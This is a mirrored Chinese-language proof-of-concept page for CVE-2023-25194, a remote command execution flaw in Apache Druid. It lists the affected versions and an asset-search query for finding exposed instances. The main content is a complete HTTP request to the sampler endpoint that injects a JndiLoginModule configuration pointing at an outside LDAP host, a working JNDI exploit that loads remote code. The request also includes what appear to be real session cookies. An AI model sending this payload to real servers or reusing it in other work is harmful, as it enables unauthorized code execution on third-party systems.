mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-30 10:10:32 +00:00
83 lines
3.4 KiB
Markdown
83 lines
3.4 KiB
Markdown
|
# Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析("OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)</font>
|
|||
|
|
|
|||
|
|
# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
|
|||
|
|
+ 0.19.0 <= Apache Druid <= 25.0.0
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
```java
|
|||
|
|
title="Apache Druid"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```java
|
|||
|
|
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Content-Length: 1400
|
|||
|
|
Accept: application/json, text/plain, */*
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
|
|||
|
|
Content-Type: application/json
|
|||
|
|
Origin: http://vps:8888
|
|||
|
|
Referer: http://vps:8888/unified-console.html
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Cookie: pZaf_2132_ulastactivity=050484OuqAxDqETcOja26QKgFkE4HbrlSk4NbAkGRg9oNLIbkCUN; pZaf_2132_nofavfid=1; pZaf_2132_smile=1D1; pZaf_2132_home_readfeed=1682214968; pZaf_2132_lastviewtime=1%7C1682215445; pZaf_2132_lastcheckfeed=1%7C1682217817; kOJf_2132_saltkey=MGWItu8r; kOJf_2132_lastvisit=1683339017; kOJf_2132_ulastactivity=27e4qsFumyqDRGo03vcLLEHChJmZRharD1jfbUJnU1NIIIrbB8UL; kOJf_2132_nofavfid=1; kOJf_2132_lastcheckfeed=1%7C1683342726; PHPSESSID=3543e022151ed94117e84216
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
{
|
|||
|
|
"type":"kafka",
|
|||
|
|
"spec":{
|
|||
|
|
"type":"kafka",
|
|||
|
|
"ioConfig":{
|
|||
|
|
"type":"kafka",
|
|||
|
|
"consumerProperties":{
|
|||
|
|
"bootstrap.servers":"127.0.0.1:6666",
|
|||
|
|
"sasl.mechanism":"SCRAM-SHA-256",
|
|||
|
|
"security.protocol":"SASL_SSL",
|
|||
|
|
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://wuriedscos.dgrh3.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
|
|||
|
|
},
|
|||
|
|
"topic":"test",
|
|||
|
|
"useEarliestOffset":true,
|
|||
|
|
"inputFormat":{
|
|||
|
|
"type":"regex",
|
|||
|
|
"pattern":"([\\s\\S]*)",
|
|||
|
|
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
|
|||
|
|
"columns":[
|
|||
|
|
"raw"
|
|||
|
|
]
|
|||
|
|
}
|
|||
|
|
},
|
|||
|
|
"dataSchema":{
|
|||
|
|
"dataSource":"sample",
|
|||
|
|
"timestampSpec":{
|
|||
|
|
"column":"!!!_no_such_column_!!!",
|
|||
|
|
"missingValue":"1970-01-01T00:00:00Z"
|
|||
|
|
},
|
|||
|
|
"dimensionsSpec":{
|
|||
|
|
|
|||
|
|
},
|
|||
|
|
"granularitySpec":{
|
|||
|
|
"rollup":false
|
|||
|
|
}
|
|||
|
|
},
|
|||
|
|
"tuningConfig":{
|
|||
|
|
"type":"kafka"
|
|||
|
|
}
|
|||
|
|
},
|
|||
|
|
"samplerConfig":{
|
|||
|
|
"numRows":500,
|
|||
|
|
"timeoutMs":15000
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-06-17 09:22:47
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bfg6tey47m6g5aaa>
|